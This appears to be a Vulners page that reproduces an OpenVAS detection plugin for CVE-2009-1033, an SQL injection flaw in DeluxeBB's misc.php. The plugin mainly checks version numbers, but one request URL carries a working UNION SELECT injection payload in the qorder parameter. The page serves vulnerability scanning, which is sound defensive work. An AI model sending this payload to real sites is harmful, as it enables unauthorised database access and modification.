DeluxeBB 'misc.php' SQL Injection Vulnerability
🗓️ 20 Mar 2009 00:00:00Reported by Copyright (C) 2009 Greenbone Networks GmbHType
openvas🔗 plugins.openvas.org👁 23 Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
| CVE-2009-1033 | 18 Mar 200900:00 | – | circl | |
| CVE-2009-1033 | 20 Mar 200918:00 | – | cve | |
| CVE-2009-1033 | 20 Mar 200918:00 | – | cvelist | |
| DeluxeBB 1.3 - 'qorder' SQL Injection | 18 Mar 200900:00 | – | exploitdb | |
| EUVD-2009-1034 | 7 Oct 202500:30 | – | euvd | |
| CVE-2009-1033 | 20 Mar 200918:30 | – | nvd | |
| DeluxeBB 'misc.php' SQL Injection Vulnerability | 20 Mar 200900:00 | – | openvas | |
| Sql injection | 20 Mar 200918:30 | – | prion | |
| Sql injection | 3 Nov 201020:00 | – | prion | |
| PT-2010-5323 · Deluxebb · Deluxebb | 3 Nov 201000:00 | – | ptsecurity |
| Source | Link |
|---|---|
| deluxebb | www.deluxebb.com/ |
| securityfocus | www.securityfocus.com/bid/34174 |
# Copyright (C) 2009 Greenbone Networks GmbH
# Some text descriptions might be excerpted from (a) referenced
# source(s), and are Copyright (C) by the respective right holder(s).
#
# SPDX-License-Identifier: GPL-2.0-or-later
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
CPE = "cpe:/a:deluxebb:deluxebb";
if(description)
{
script_oid("1.3.6.1.4.1.25623.1.0.100064");
script_version("2022-05-09T13:48:18+0000");
script_tag(name:"last_modification", value:"2022-05-09 13:48:18 +0000 (Mon, 09 May 2022)");
script_tag(name:"creation_date", value:"2009-03-20 11:01:53 +0100 (Fri, 20 Mar 2009)");
script_tag(name:"cvss_base", value:"7.5");
script_tag(name:"cvss_base_vector", value:"AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_cve_id("CVE-2009-1033");
script_name("DeluxeBB 'misc.php' SQL Injection Vulnerability");
script_category(ACT_ATTACK);
script_family("Web application abuses");
script_copyright("Copyright (C) 2009 Greenbone Networks GmbH");
script_dependencies("deluxeBB_detect.nasl");
script_mandatory_keys("deluxebb/installed");
script_xref(name:"URL", value:"http://www.securityfocus.com/bid/34174");
script_xref(name:"URL", value:"http://www.deluxebb.com/");
script_tag(name:"solution", value:"No known solution was made available for at least one year since the disclosure
of this vulnerability. Likely none will be provided anymore. General solution options are to upgrade to a newer
release, disable respective features, remove the product or replace the product by another one.");
script_tag(name:"summary", value:"DeluxeBB is prone to an SQL-injection vulnerability because it fails to
sufficiently sanitize user-supplied data before using it in an SQL query.");
script_tag(name:"impact", value:"Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit
latent vulnerabilities in the underlying database.");
script_tag(name:"affected", value:"DeluxeBB 1.3 and earlier versions are vulnerable.");
script_tag(name:"solution_type", value:"WillNotFix");
script_tag(name:"qod_type", value:"remote_app");
exit(0);
}
include("host_details.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("version_func.inc");
if(!port = get_app_port(cpe: CPE))
exit(0);
if(!infos = get_app_version_and_location(cpe: CPE, port: port, exit_no_version: FALSE))
exit(0);
version = infos["version"];
dir = infos["location"];
if (dir == "/")
dir = "";
if (version_is_less_equal(version: version, test_version: "1.3")) {
report = report_fixed_ver(installed_version: version, fixed_version: "None", install_url:dir);
security_message(port: port, data: report);
exit(0);
} else {
url = dir + "/misc.php?sub=memberlist&order=1&qorder=UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,0x53514c2d496e6a656374696f6e2d54657374,16,17,18,19,20,21,22,23,24,25,26,27,28,29%23&sort=ASC&filter=all&searchuser=.&submit=1";
req = http_get(item:url, port:port);
buf = http_keepalive_send_recv(port:port, data:req, bodyonly:FALSE);
if(!buf) exit(0);
if (egrep(pattern: "SQL-Injection-Test", string: buf)) {
report = http_report_vuln_url(port:port, url:url);
security_message(port:port, data:report);
exit(0);
}
}
exit(99);
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
09 May 2022 00:00Current
7High risk
Vulners AI Score7
CVSS 27.5
EPSS0.01024